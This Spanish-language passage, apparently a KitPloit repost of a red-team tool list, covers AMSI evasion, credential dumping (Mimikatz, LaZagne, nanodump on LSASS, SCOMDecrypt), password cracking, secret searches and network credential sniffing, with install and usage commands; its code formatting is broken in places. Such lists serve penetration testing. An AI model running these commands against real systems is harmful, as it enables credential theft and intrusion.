go get github.com/Binject/debug/pe

Luego constrúyelo``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**Uso:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

La información de uso completo se puede encontrar aquí.

image

Imagen utilizada de https://github.com/optiv/Mangle

🔙AMSI Fail

AMSI.fail es un gran sitio web que se puede utilizar para generar fragmentos de PowerShell ofuscados que rompen o deshabilitan AMSI para el proceso actual.

Los fragmentos se seleccionan aleatoriamente de un pequeño grupo de técnicas/variaciones antes de ser ofuscados. Cada fragmento se ofusca en tiempo de ejecución/solicitud para que ningún resultado generado comparta las mismas firmas.

Un buen blog de f-secure que explica AMSI aquí.

image

Imagen utilizada de http://amsi.fail/

Acceso a Credenciales

🔙Mimikatz

Excelente herramienta para obtener acceso a contraseñas hash y en texto claro en un endpoint de una víctima. Una vez que haya obtenido acceso privilegiado a un sistema, deje caer esta herramienta para recopilar algunas credenciales.

Instalación:

  1. Descargue el archivo mimikatz_trunk.7z.
  2. Una vez descargado, el binario mimikatz.exe se encuentra en la carpeta x64.

Uso:```bash .\mimikatz.exe privilege::debug

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a66e3040f581c95c762704952a34495375ffc7d58ad12074d747869851a40ad6.png)

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)

Buena herramienta para extraer contraseñas almacenadas localmente de navegadores, bases de datos, juegos, correo, git, wifi, etc.

**Instalación: (Binario)**

Puedes instalar el binario independiente desde [aquí](https://github.com/AlessandroZ/LaZagne/releases/).

**Uso:**```bash
# Launch all modes
.\laZagne.exe all

# Launch only a specific module
.\laZagne.exe browsers

# Launch only a specific software script
.\laZagne.exe browsers -firefox

image

🔙hashcat

Herramienta para descifrar hashes de contraseñas. Admite una gran lista de algoritmos de hash (La lista completa se puede encontrar aquí).

Instalación: Binario

Puedes instalar el binario independiente desde aquí.

Uso:```bash .\hashcat.exe --help

root@kitploit:~
Buena hoja de referencia de comandos de hashcat [cheatsheet](https://cheatsheet.haax.fr/passcracking-hashfiles/hashcat_cheatsheet/).

![imagen](https://assets.kitploit.com/production/public/readmes/495/94e510535cc8f8fa1853dfc04b4c17963ff9a1771e43f3cfad93c9699442e0d6.png)

### [🔙](#tool-list)[John the Ripper](https://github.com/openwall/john)

Otro cracker de contraseñas, que soporta cientos de tipos de hash y cifrados, y se ejecuta en muchos sistemas operativos, CPUs y GPUs.

**Instalación:**```bash
sudo apt-get install john -y

Uso:```bash john

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/36fca17b620393b7e2406306d90155436188b2032a7a0dfe07ada24a5e1f6579.png)

### [🔙](#tool-list)[SCOMDecrypt](https://github.com/nccgroup/SCOMDecrypt)

Esta herramienta está diseñada para recuperar y descifrar las credenciales RunAs almacenadas en las bases de datos de Microsoft System Center Operations Manager (SCOM).

Publicación del blog de NCC - ['¿SCOMplicado? – Descifrando credenciales SCOM "RunAs"'](https://research.nccgroup.com/2017/02/23/scomplicated-decrypting-scom-runas-credentials/)

**Requisitos previos:**

Para ejecutar la herramienta necesitará privilegios administrativos en el servidor SCOM. También deberá asegurarse de tener acceso de lectura a la siguiente clave de registro:```
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\MOMBins

Puede verificar manualmente que puede ver la base de datos obteniendo los detalles de conexión de las siguientes claves:``` HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseServerName HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\System Center\2010\Common\Database\DatabaseName

root@kitploit:~
**Instalar: (PS1)**```
git clone https://github.com/nccgroup/SCOMDecrypt
cd .\SCOMDecrypt\SCOMDecrypt\
. .\Invoke-SCOMDecrypt.ps1

Instalación: (Compilación)

Usando Visual Studio 2019 Community Edition puedes compilar el binario de SCOMDecrypt.

Abre el proyecto .sln de SCOMDecrypt, elige "Release" y compila.

Uso:```bash

PS1

Invoke-SCOMDecrypt

Compiled C# binary

.\SCOMDecrypt.exe

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/fe1dd762d4cb4590a60e45aad6088e96138f152205c6048c9cf2ddea900bdac9.png)

_Texto de imagen utilizado de https://github.com/nccgroup/SCOMDecrypt_

### [🔙](#tool-list)[nanodump](https://github.com/helpsystems/nanodump)

LSASS (Local Security Authority Subsystem Service) es un proceso del sistema en el sistema operativo Windows que se encarga de aplicar la política de seguridad en el sistema. Es responsable de una serie de tareas relacionadas con la seguridad, incluyendo la autenticación de usuarios para el inicio de sesión, la aplicación de políticas de seguridad y la generación de registros de auditoría.

La creación de un volcado de este proceso puede permitir a un atacante extraer hashes de contraseñas u otra información sensible de la memoria del proceso, lo que podría ser utilizado para comprometer el sistema aún más.

Esto permite la creación de un minidump del proceso LSASS.

**Instalación:**```bash
git clone https://github.com/helpsystems/nanodump.git

Instalación: (Linux con MinGW)```bash make -f Makefile.mingw

root@kitploit:~
**Instalar: (Windows con MSVC)**```bash
nmake -f Makefile.msvc

Instalación: (solo CobaltStrike)

Importe el script NanoDump.cna en Cobalt Strike.

La información completa de instalación se puede encontrar aquí.

Uso:```bash

Run

nanodump.x64.exe

Leverage the Silent Process Exit technique

nanodump --silent-process-exit C:\Windows\Temp\

Leverage the Shtinkering technique

nanodump --shtinkering

root@kitploit:~
La información completa de uso se puede encontrar [aquí](https://github.com/helpsystems/nanodump#1-usage).

![nanodump](https://assets.kitploit.com/production/public/readmes/495/6e7fe4b0b8bf59311dd6fc422ae0f2d27c3e6eae77da978ffb495ec294749596.jpg)

_Imagen usada de https://github.com/helpsystems/nanodump_

### [🔙](#tool-list)[eviltree](https://github.com/t3l3machus/eviltree)

Una versión independiente en python3 del clásico comando "tree" con la característica adicional de buscar palabras clave/expresiones regulares proporcionadas por el usuario en archivos, resaltando aquellos que contienen coincidencias. Creado por dos razones principales:

- Mientras se buscan secretos en archivos de estructuras de directorios anidadas, poder visualizar qué archivos contienen patrones de palabras clave/expresiones regulares proporcionadas por el usuario y dónde se encuentran esos archivos en la jerarquía de carpetas, proporciona una ventaja significativa.
- `tree` es una herramienta increíble para analizar estructuras de directorios. Es muy útil tener una alternativa independiente del comando para la enumeración post-explotación, ya que no está preinstalado en todas las distribuciones de Linux y es algo limitado en Windows (en comparación con la versión UNIX).

**Instalación:**```bash
git clone https://github.com/t3l3machus/eviltree

Uso:```bash

Running a regex that essentially matches strings similar to: password = something against /var/www

python3 eviltree.py -r /var/www -x ".{0,3}passw.{0,3}[=]{1}.{0,18}" -v

Using comma separated keywords instead of regex

python3 eviltree.py -r C:\Users\USERNAME -k passw,admin,account,login,user -L 3 -v

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/ad11b6297c86be15d9f3a51d45f9f25bda572bac8dd2e39a3d46c33f88fa43dc.png)

_Imagen utilizada de https://github.com/t3l3machus/eviltree_

### [🔙](#tool-list)[SeeYouCM-Thief](https://github.com/trustedsec/SeeYouCM-Thief)

Herramienta sencilla para descargar y analizar automáticamente archivos de configuración de sistemas telefónicos Cisco en busca de credenciales SSH.

Opcionalmente también enumerará usuarios de Active Directory desde la API UDS.

[Blog - Explotando configuraciones incorrectas comunes en sistemas telefónicos Cisco](https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/)

**Instalación:**```bash
git clone https://github.com/trustedsec/SeeYouCM-Thief
python3 -m pip install -r requirements.txt

Uso:```bash

Enumerate Active Directory users from the UDS api on the CUCM

./thief.py -H --userenum

Without specifying a phone IP address the script will attempt to download every config in the listing.

./thief.py -H [--verbose]

Parse the web interface for the CUCM address and will do a reverse lookup for other phones in the same subnet.

./thief.py --phone [--verbose]

Specify a subnet to scan with reverse lookups.

./thief.py --subnet [--verbose]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/e5711956a7db9d9750077ca3be1c9de261642de6fc954b37878095dd25741d80.png)

_Imagen utilizada de https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/_

### [🔙](#tool-list)[MailSniper](https://github.com/dafthack/MailSniper)

MailSniper es una herramienta de pruebas de penetración para buscar correos electrónicos en un entorno Microsoft Exchange en busca de términos específicos (contraseñas, inteligencia interna, información de arquitectura de red, etc.). Puede ser utilizada por un usuario no administrador para buscar en su propio correo electrónico o por un administrador de Exchange para buscar en los buzones de todos los usuarios de un dominio.

MailSniper también incluye módulos adicionales para rociado de contraseñas, enumeración de usuarios y dominios, obtención de la Lista de direcciones global (GAL) desde OWA y EWS, y verificación de permisos de buzón para cada usuario de Exchange en una organización.

Una excelente publicación de blog con más información [aquí](https://www.blackhillsinfosec.com/introducing-mailsniper-a-tool-for-searching-every-users-email-for-sensitive-data/).

[Manual de campo de MailSniper](http://www.dafthack.com/files/MailSniper-Field-Manual.pdf)

**Instalación:**```
git clone https://github.com/dafthack/MailSniper
cd MailSniper
Import-Module MailSniper.ps1

Uso:```bash

Search current users mailbox

Invoke-SelfSearch -Mailbox [email protected]

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/b1b906ecbe7771ed394a43a8a5dae4bf68e14d70108c967f7f490aeb8dd519bd.png)

_Imagen utilizada de https://patrowl.io/_

# Descubrimiento

### [🔙](#tool-list)[PCredz](https://github.com/lgandx/PCredz)

Esta herramienta extrae números de tarjetas de crédito, NTLM (DCE-RPC, HTTP, SQL, LDAP, etc.), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc. de un archivo pcap o de una interfaz en vivo.

**Instalación:**```bash
git clone https://github.com/lgandx/PCredz

Uso: (Carpeta de archivos PCAP)```python python3 ./Pcredz -d /tmp/pcap-directory-to-parse/

root@kitploit:~
**Uso:** (Live Capture)```python
python3 ./Pcredz -i eth0 -v

image

🔙PingCastle

Ping Castle es una herramienta diseñada para evaluar rápidamente el nivel de seguridad de Active Directory con una metodología basada en la evaluación de riesgos y un marco de madurez. No busca una evaluación perfecta, sino un compromiso de eficiencia.

Instalación: (Descargar)``` https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip

root@kitploit:~
**Uso:**```python
./PingCastle.exe

image

🔙Seatbelt

Seatbelt es una herramienta útil para recopilar información detallada sobre la postura de seguridad de una máquina Windows objetivo, con el fin de identificar posibles vulnerabilidades y vectores de ataque.

Está diseñada para ejecutarse en una máquina víctima comprometida, recopilando información sobre la configuración de seguridad actual, incluyendo datos sobre el software instalado, servicios, directivas de grupo y otras configuraciones relacionadas con la seguridad.

Instalación: (Compilar)

Seatbelt ha sido compilado para .NET 3.5 y 4.0 con características de C# 8.0 y es compatible con Visual Studio Community Edition.

Abra el archivo .sln del proyecto, seleccione "release" y compile.

Uso:```bash

Run all checks and output to output.txt

Seatbelt.exe -group=all -full > output.txt

Return 4624 logon events for the last 30 days

Seatbelt.exe "LogonEvents 30"


Read more